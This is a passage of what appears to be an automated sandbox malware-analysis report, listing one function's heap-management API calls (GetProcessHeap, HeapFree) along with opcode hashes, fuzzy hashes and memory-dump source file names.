                                      • API String ID: 2053020834-2158758863
                                      • Opcode ID: 77c40cacc15807934d1b27ea7840e811ec689a4db7c47f2a0e4acd7d7893cd71
                                      • Instruction ID: 1d3395ee9ef0c012a353e913b6fd3990c9802c2319b127fe61edeccff82f53d3
                                      • Opcode Fuzzy Hash: 77c40cacc15807934d1b27ea7840e811ec689a4db7c47f2a0e4acd7d7893cd71
                                      • Instruction Fuzzy Hash: 5DD0C962C0820C9A9F18EAE18807DDE77A8DA48701F200847FA20A7441AA66FA1C4762
                                      Function 00940260 Relevance: 5.1, APIs: 4, Instructions: 90memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,7622DF60), ref: 0094032F
                                      • HeapFree.KERNEL32(00000000), ref: 0094033C
                                      • GetProcessHeap.KERNEL32(00000000,762330E0,?,762330E0,00000000,00990CB8,000000FF), ref: 00940372
                                      • HeapFree.KERNEL32(00000000,?,762330E0,00000000,00990CB8,000000FF), ref: 00940379
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: e52a27f7362260e5cbbf22036f81b8750162b2c914fa8bab108de637ce6dad93
                                      • Instruction ID: 5f59675a8b20581904f00f8bd33cc70bea21acc9fdb51b39a30a02d289f1e617
                                      • Opcode Fuzzy Hash: e52a27f7362260e5cbbf22036f81b8750162b2c914fa8bab108de637ce6dad93
                                      • Instruction Fuzzy Hash: B531B47190A614AFDB21CF68C948B5AFBB8EF85720F24435AEA38973D0D7745901CB90